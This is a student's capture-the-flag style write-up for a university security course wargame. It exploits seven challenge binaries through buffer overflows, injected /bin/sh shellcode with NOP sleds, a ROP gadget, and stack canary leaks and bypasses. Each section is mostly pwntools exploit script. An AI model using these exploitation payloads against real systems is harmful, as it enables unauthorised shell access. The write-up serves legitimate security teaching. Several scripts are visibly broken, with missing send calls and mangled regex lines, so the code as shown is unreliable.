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319 lines (231 loc) · 7.75 KB

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319 lines (231 loc) · 7.75 KB

COMP6447 Wargame 1 - Johnathan Liauw (z5136212)

0. buffer-1 - jump

General overview of problems faced:

List of vulnerabilities:

  1. The input from user can overflow the buffer and overwrite the function pointer

Steps to exploit:

  1. Enter exactly 64 bytes to overflow the buffer and then append the win function address (0x080491d2)

Script/Command used:


from pwn import *

host = ""
port = 5001
address = (host, port)

winAddr = 0x080491d2
offset = 64

c = remote(host, port)

payload = "a"*offset + p32(winAddr)
print("Sending payload: %s" % (payload))



1. buffer-2 - blind

General overview of problems faced:

List of vulnerabilities:

  1. The input from user can overflow the buffer and overwrite the return address of the main function

Steps to exploit:

  1. Use a cyclic pattern to find the offset to the return address
  2. Enter exactly offset bytes to get to the return address then append the win function address (0x080484cd)

Script/Command used:

ragg2 -P 200 -r > pattern.txt
(gdb) run < pattern.txt

from pwn import *

host = ""
port = 5002
win_address = 0x080484cd
return_offset = 76

c = remote(host, port)

payload = "a"*return_offset + p32(win_address)

print("Sending payload: %s" % (payload))



2. buffer-3 - runner

General overview of problems faced:
Have to use shellcode, I have learnt it from "Hacking - The Art of Exploitation" before so here I just using a borrowed shellcode

List of vulnerabilities:

  1. Not really a vulnerability, it is just calling to the user's input

Steps to exploit:

  1. Enter a shellcode to prompt a shell

Script/Command used:


from pwn import *

host = ""
port = 5003

c = remote(host, port)

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"



3. buffer-4 - shellz

General overview of problems faced:
Have to guess the address to return to the shellcode which can be done with NOP sled or ROP gadgets

List of vulnerabilities:

  1. The input from user can overflow the buffer and overwrite the return address of the main function

Steps to exploit:

  1. Use a cyclic pattern to find the offset to the return address
  2. From the binary I found that the address of the overflowing buffer is stored in eax and remained unchanged until the end of the program so I can use a ROP gadget to "call eax" and execute my shellcode
  3. Use ropper to find a gadget for "call eax"
  4. Enter a payload with offset NOPs and the shellcode in the middle, then append the gadget (0x08048406)

Script/Command used:

ropper -f shellz
ragg2 -P 10000 -r > pattern.txt
(gdb) run < pattern.txt

from pwn import *

host = ""
port = 5004

offset = 8204
gadget = 0x08048406

c = remote(host, port)

payload = "\x90"*8000 
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
payload += "a"*181
payload += p32(gadget)

print("Sending payload...")



4. canary-1 - elitecanary

General overview of problems faced:

List of vulnerabilities:

  1. Input from user can overflow the buffer and overwrite the next variable in the stack

Steps to exploit:

  1. From the binary, find the offset of the buffer to the target variable
  2. From the binary, find the content required in the target variable (1337)
  3. Enter exactly offset bytes, then append the required content

Script/Command used:


from pwn import *

host = ""
port = 6001

offset = 32

c = remote(host, port)

payload = "a"*32 + "1337"

print("Sending payload: %s" % (payload))


5. canary-2 - shellcrack

General overview of problems faced:
Have to research about canary and methods to bypass it

List of vulnerabilities:

  1. Using fread to get a 16 bytes input from user but did not add a null terminator at the end which cause the printf function to print the memory until the next null byte and thus leaked the value of the canary

Steps to exploit:

  1. Enter 15 bytes and then a newline "\n" to the buffer
  2. Extract the first 8 bytes of output after the newline which is going to be the value of the canary
  3. From the binary, find the offset to overwrite the canary value
  4. Put the shellcode before the canary value and have (offset-shellcode_length) NOPs before it
  5. Use a cyclic pattern with the payload from above before to find the offset to overwrite the return address
  6. Finally fill the offset to return address and append the buffer address given

Script/Command used:


from pwn import *
import re

host = ""
port = 6002

leak_payload = "a"*15 + "\n"
leak_payload = leak_payload[:-1]

c = remote(host, port)
#c = process('../shellcrack')


print("Sending payload to leak canary...")


leak = c.recvline()
leak = leak[:8]
print("Leaked Canary: %s" % (leak))

reply = c.recvline()
address ='0x(.{8})', reply).group(0)
print("Buffer Address: %s" % (address))
address = int(address, 0)
address = p32(address)

payload = "\x90"*25
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
payload += leak
#payload += cyclic(1000)
offset = cyclic_find(0x61616166)
payload += "a"*offset
payload += address



6. canary-3 - stackdump

General overview of problems faced:
Have to properly comment the assembly in order to fully understand how this binary works

List of vulnerabilities:

  1. In the "dump memory" function, rather than dumping variable given in the assembly, it is dumping the address stored in the variable and since we can write to the variable in the "input option" function, we can view the value of any address

Steps to exploit:

  1. From the binary, find the offset from the given pointer to the address storing the canary
  2. Input the address storing the canary
  3. Dump the memory and extract the canary value
  4. Use a cyclic pattern to find the offset to overwrite the return address
  5. Append the win function address to the end of the payload with the offsets and canary

Script/Command used:


from pwn import *
import re

host = ""
port = 6003

win_addr = 0x080486cd
offset = 96

c = remote(host, port)
#c = process("../stack-dump")

#c = gdb.debug("../stack-dump")

reply = c.recvlines(2)  # starting lines
stack_ptr ='0x(.{8})', reply[1]).group(0)                                          
print("Useful stack pointer: %s" % (stack_ptr))                                               



stack_ptr = int(stack_ptr, 0)
stack_ptr += 105

payload_leak = p32(stack_ptr)
payload_leak += "\n"




canary = c.recvline()
canary = canary[22:26]
print("Canary: %s (%d bytes)" %(canary, len(canary)))                                         


addr_offset = cyclic_find(0x61616164)

size = offset + 4 + addr_offset + 4 + 1

payload_return = "a"*offset
payload_return += canary
#payload_return += cyclic(size-offset-4-1)
payload_return += "a"*addr_offset
payload_return += p32(win_addr)
payload_return += "\n"

